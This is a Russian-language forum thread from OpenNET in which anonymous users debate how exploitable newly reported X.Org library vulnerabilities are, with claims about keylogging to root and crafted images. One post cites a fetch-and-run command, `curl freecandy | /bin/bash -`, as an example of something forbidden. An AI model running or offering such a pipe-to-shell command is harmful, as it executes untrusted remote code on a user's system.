The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Уязвимости в библиотеках X.Org, две из которых присутствуют с 1988 года, opennews (??), 11-Окт-23, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


5. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +3 +/
Сообщение от Аноним (-), 11-Окт-23, 12:16 
Уязвимости которые даже в тепличных созданных специально условиях хрен поймёшь как эксплуатировать.
Ответить | Правка | Наверх | Cообщить модератору

17. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  –4 +/
Сообщение от Аноним (17), 11-Окт-23, 12:34 
от тебя понимания не требуется. Твое дело - продолжать пользоваться иксами и не обращать ни на что внимания. А выгоду от этих CVE будут получать другие люди. А ты, как я уже сказал, продолжай пользоваться!
Ответить | Правка | Наверх | Cообщить модератору

20. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +/
Сообщение от Аноним (3), 11-Окт-23, 12:39 
Покажите хоть один случай атаки на иксы кодом, который не должен был иметь доступа к иксам, но он таки случился. При этом сокет исключительно локально-смотрящий и `curl freecandy | /bin/bash -` запрещён.
Ответить | Правка | Наверх | Cообщить модератору

24. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +/
Сообщение от Аноним (17), 11-Окт-23, 12:43 
> который не должен был иметь доступа к иксам, но он таки случился

С этим проблем нет. Проблема в том, что когда доступ есть, то рута можно получить в течение нескольких часов/дней кейлоггинга. Еще раз: если ты запускаешь прогу из-под самого себя (не рута), то эта прога сможет получить рут, и она его получит.

Ответить | Правка | Наверх | Cообщить модератору

29. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +/
Сообщение от Аноним (3), 11-Окт-23, 12:49 
С таким подходом к тому, что запускать у себя на "супер-защищённой" системе проще уж виндой пользоваться и как обычно переустанавливать шиндус раз-два в месяц. Или таки запускать в виртуальной машине всякую дрянь на десять миллионов строк кода, которые ничего не делают кроме как жрут гигабайты памяти и тротлят процессор в простое (привет, плагины для текстовых редакторов на node.js, которые прямо это и делают, хотя полезную нагрузку выполняет одна строчка, где происходит exec("/bin/sh" "./parse-code.sh"))
Ответить | Правка | Наверх | Cообщить модератору

37. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +1 +/
Сообщение от Аноним (17), 11-Окт-23, 12:56 
> проще уж виндой
> Или таки запускать в виртуальной машине

Не обязательно. Можно просто продолжать развивать средства изоляции. В иксах изоляции нет и не предвидится.

Ответить | Правка | Наверх | Cообщить модератору

53. "Уязвимости в библиотеках X.Org, две из которых присутствуют ..."  +/
Сообщение от Аноньимъ (ok), 11-Окт-23, 13:22 
>  Уязвимости которые даже в тепличных созданных специально условиях хрен поймёшь как эксплуатировать.

Вообще-то, их очень элементарно эксплуатировать, просто нужно отослать правильную картинку на отрисовку.

Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру